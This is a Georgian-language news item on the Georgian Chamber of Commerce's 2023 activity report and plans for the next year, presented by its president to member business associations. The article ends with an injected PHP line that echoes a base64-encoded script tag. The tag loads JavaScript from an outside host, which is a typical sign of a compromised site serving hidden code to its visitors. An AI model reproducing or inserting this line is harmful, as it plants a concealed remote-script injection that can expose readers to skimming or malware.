celsiusi
ავერსი შნაიდერი

სავაჭრო პალატის პრეზიდეტმა, გიორგი პერტაიამ პალატის საბჭოში შემავალ ბიზნეს ასოციაციებს 2023 წლის საქმიანობის ანგარიში წარუდგინა და მომავალი წლის გეგმები გააცნო.

საქართველოს სავაჭრო პალატის ინფორმაციით, ბიზნეს ასოციაციებმა მიიღეს დეტალური ინფორმაცია მიმდინარე წლის განმავლობაში განხორციელებულ პროგრამებსა და პალატის საერთაშორისო საქმიანობაზე, კერძოდ 2023 წელს:

პალატის პრეზიდენტი არჩეულ იქნა ევროპალატისა და მსოფლიო პალატების ფედერაციის დირექტორთა საბჭოში;

პალატის ორგანიზებით ჩატარდა 10-მდე ბიზნეს ფორუმი, მათ შორის არაბთა გაერთიანებულ საამიროებთან, ჩეხეთთან, უზბეკეთთან, რომელშიც 1500-ზე მეტმა კომპანიამ მიიღო მონაწილეობა;

500-ზე მეტმა კომპანიამ მიიღო მონაწილეობა პალატის დაორგანიზებულ ტრენინგებში (საგადასახადო სიახლეების, ელექტრნული კომერციის, ბრენდინგისა და ციფრული მარკეტინგის მიმართულებით, შრომის კანონმდებლობა).

„პროექტის „უფასო ვებგევრდის“ ფარგლებში 130-ზე მეტ კომპანიას გადაეცა გადახდის სისტემით ინტეგრირებული ვებ-გვერდი, ჯამურად პროექტის ყველა ეტაპზე 223 მეწარმეს.

გაიცა 68-ზე მეტი წარმოშობის სერტიფიკატი; 60-ზე მეტი ინსტრუქტორი გადამზადდა პროფესიულ, კერძოდ დუალურ განათლებაში ჩასართველად. ჩატარდა რამდენიმე რეგიონული მასშტაბური ღონისძიება პროფესიული განათლების პოპულარიზაციის მიზნით;

გაფორმდა ურთიერთგაგების მემორანდუმი ტაილანდის, უზბეკეთისა და საუდის არაბეთის სავაჭო პალატებთან და სხვა.

მომავალ წელს სავაჭრო პალატა მცირე და საშუალო ბიზნესის ხელშეწყობისთვის ახალ საერთაშორისო და ადგილობრივ პროგრამებს გეგმავს, მათ შორის პროფესიული სწავლების ხელშეწყობის, ექსპორტის მხარდამჭერ ახალ პროექტებს, ბიზნეს ფორუმებს, სოფლის მეურნეობის მხარდამჭერ ღონისძიებებს, ტრენინგებს, ბიზნესთან ღია დიალოგსა და ბიზნესების გაციფრულების პროგრამებს“, - ნათქვამია იფორმაციაში.

201
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");